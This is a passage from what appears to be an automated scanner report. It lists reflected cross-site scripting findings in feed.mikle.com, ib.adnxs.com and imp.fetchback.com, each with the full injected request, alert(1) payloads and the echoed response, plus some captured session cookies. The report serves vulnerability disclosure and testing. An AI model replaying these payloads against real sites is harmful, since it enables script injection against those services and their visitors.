User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
rseInt(str);
if(isNaN(num)){
return 0;
} else if(!num) {
return 0;
}
return num;
}

function init() {
var rssMikleType = '';
var anchorTarget = '_blank';
var itemPodcast = 'iconccc5a';alert(1)//b618cdd9d71';

var containerObj = document.getElementById('container');
var headerObj = document.getElementById('header') ? document.getElementById('header') : "";
var contentObj = document.getElementById('
...[SNIP]...

6.116. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_title_color parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.mikle.com
Path:	/feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_title_color request parameter is copied into the HTML document as plain text between tags. The payload 1f355<script>alert(1)</script>578c7374c8 was submitted in the rssmikle_item_title_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A31f355<script>alert(1)</script>578c7374c8&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
#content .feed_item{margin:0 0 7px 0;padding:0 0 7px 0;border-bottom:1px dashed #CCCCCC;}
#content .feed_item_title{margin:1px 0 1px 3px;padding:1px 2px 1px 3px;color:#2F50A31f355<script>alert(1)</script>578c7374c8;font-weight:bold;}
#content .feed_item_title a:link{color:#2F50A31f355<script>
...[SNIP]...

6.117. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_target parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.mikle.com
Path:	/feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9092f'%3balert(1)//3a808ff0e01 was submitted in the rssmikle_target parameter. This input was echoed as 9092f';alert(1)//3a808ff0e01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank9092f'%3balert(1)//3a808ff0e01&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
n strToInt(str) {
num = parseInt(str);
if(isNaN(num)){
return 0;
} else if(!num) {
return 0;
}
return num;
}

function init() {
var rssMikleType = '';
var anchorTarget = '_blank9092f';alert(1)//3a808ff0e01';
var itemPodcast = 'icon';

var containerObj = document.getElementById('container');
var headerObj = document.getElementById('header') ? document.getElementById('header') : "";
var contentObj
...[SNIP]...

6.118. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_target parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.mikle.com
Path:	/feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8879"><script>alert(1)</script>6430bab1586 was submitted in the rssmikle_target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blankc8879"><script>alert(1)</script>6430bab1586&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="http://asianewsnetwork.feedsportal.com/c/33359/f/566602/s/17ee84d1/l/0L0Sasianewsnet0Bnet0Chome0Cnews0Bphp0Did0F21347/story01.htm" target="_blankc8879"><script>alert(1)</script>6430bab1586">
...[SNIP]...

6.119. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_bgcolor parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.mikle.com
Path:	/feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_title_bgcolor request parameter is copied into the HTML document as plain text between tags. The payload 2a452<script>alert(1)</script>842b4a6f648 was submitted in the rssmikle_title_bgcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA2a452<script>alert(1)</script>842b4a6f648&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
ner{overflow:hidden;margin:0;padding:0;width:325px;height:200px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#2561BA2a452<script>alert(1)</script>842b4a6f648;background-image:url(http://);}
#header .feed_title{margin:0;padding:0;font-weight:bold;}
#header .feed_title a:link{color:#FFFFFF;text-decoration:none;}
#hea
...[SNIP]...

6.120. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_bgimage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.mikle.com
Path:	/feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_title_bgimage request parameter is copied into the HTML document as plain text between tags. The payload f266c<script>alert(1)</script>848a932e7f1 was submitted in the rssmikle_title_bgimage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2Ff266c<script>alert(1)</script>848a932e7f1&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
padding:0;width:325px;height:200px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#2561BA;background-image:url(http://f266c<script>alert(1)</script>848a932e7f1);}
#header .feed_title{margin:0;padding:0;font-weight:bold;}
#header .feed_title a:link{color:#FFFFFF;text-decoration:none;}
#header .feed_title a:visited{col
...[SNIP]...

6.121. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_color parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.mikle.com
Path:	/feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_title_color request parameter is copied into the HTML document as plain text between tags. The payload c3aa7<script>alert(1)</script>c2a92fd9cfe was submitted in the rssmikle_title_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFFc3aa7<script>alert(1)</script>c2a92fd9cfe&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
0;}
#container{overflow:hidden;margin:0;padding:0;width:325px;height:200px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFFc3aa7<script>alert(1)</script>c2a92fd9cfe;background-color:#2561BA;background-image:url(http://);}
#header .feed_title{margin:0;padding:0;font-weight:bold;}
#header .feed_title a:link{color:#FFFFFFc3aa7<script>
...[SNIP]...

6.122. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feed.mikle.com
Path:	/feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_type request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88a7c'%3balert(1)//0a59d45db97 was submitted in the rssmikle_type parameter. This input was echoed as 88a7c';alert(1)//0a59d45db97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=88a7c'%3balert(1)//0a59d45db97&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:28:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
';
}
return tag;
}

function strToInt(str) {
num = parseInt(str);
if(isNaN(num)){
return 0;
} else if(!num) {
return 0;
}
return num;
}

function init() {
var rssMikleType = '88a7c';alert(1)//0a59d45db97';
var anchorTarget = '_blank';
var itemPodcast = 'icon';

var containerObj = document.getElementById('container');
var headerObj = document.getElementById('header') ? document.getElementById('
...[SNIP]...

6.123. http://ib.adnxs.com/ab [ccd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The value of the ccd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0dea'-alert(1)-'eb8770d46f9 was submitted in the ccd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ab?enc=AAAAAAAAEEApXI_C9SgMQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAXBljhQAAAAA.&tt_code=vert-29&udj=uf%28%27a%27%2C+22407%2C+1315103289%29%3Buf%28%27c%27%2C+133618%2C+1315103289%29%3Buf%28%27r%27%2C+552611%2C+1315103289%29%3Bppv%2815706%2C+%278375801096906282887%27%2C+1315103289%2C+1315362489%2C+133618%2C+25661%29%3B&cnd=!1xYx6wjykwgQo90hGAAgvcgBMAA4jzhAAEjYB1AAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBArABALkBAAAAAAAAEEDBAQAAAAAAABBAyQEzMzMzMzP3P9kBAAAAAAAA8D_gAQA.&ccd=!BQXSKQjykwgQo90hGL3IASAAf0dea'-alert(1)-'eb8770d46f9&referrer=http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&media_subtypes=1&pp=AAABMjJDsl8k6iYL9tmoP8L7nDlZjEhOctPlYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZVGg1td>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3JWdNI6Q!=v6WStTMc; sess=1; uuid2=6422714091563403120

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 03:31:07 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=9223372036854775807; path=/; expires=Sat, 03-Dec-2011 03:31:07 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfu=8fG7]PE:3F.0s]#%2L_'x%SEV/i#+eBqRb7#LsAmzW9/lCds`HP(+mKpu)>6%UH-qr%qHop_br2@fCSU7U-7NN1YVyRhjA8z8MH2+N/S]qL(nhCss8v3>zv]M3ZUWcusBmTRcQtHpK'R`=ls*J!:!Eun?en]; path=/; expires=Sat, 03-Dec-2011 03:31:07 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 04 Sep 2011 03:31:07 GMT
Content-Length: 809

document.write('<scr' + 'ipt language=\'javascript\' type=\'text/javascript\' src=\'http://imp.fetchback.com/serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAAh34QwAAAAA./cnd=!BQXSKQjykwgQo90hGL3IASAAf0dea'-alert(1)-'eb8770d46f9/referrer=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAA
...[SNIP]...

6.124. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The value of the clicktrack request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a8b9"-alert(1)-"f38fbf2b4a7 was submitted in the clicktrack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAAh34QwAAAAA./cnd=!BQXSKQjykwgQo90hGL3IASAA/referrer=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D2a8b9"-alert(1)-"f38fbf2b4a7&tid=68324&type=lead HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097285_34021:68285:1:0:0_34024:68283:2:234:326_34024:68292:2:119122:119204_34023:68293:1:119835:119835; uid=1_1315097285_1314893682667:5756480826433243; kwd=1_1315097285; scg=1_1315097285; ppd=1_1315097285; act=1_1315097285

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:29:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315106952_1314893682667:57564808264332436; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 03:29:12 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 03:29:12 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 845

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAAB
...[SNIP]...
52Fclick%253Fcd%253DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%253D%2526dst%253D2a8b9"-alert(1)-"f38fbf2b4a7&tid=68324&type=lead' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

6.125. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1781d"-alert(1)-"f40f9a0d3a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

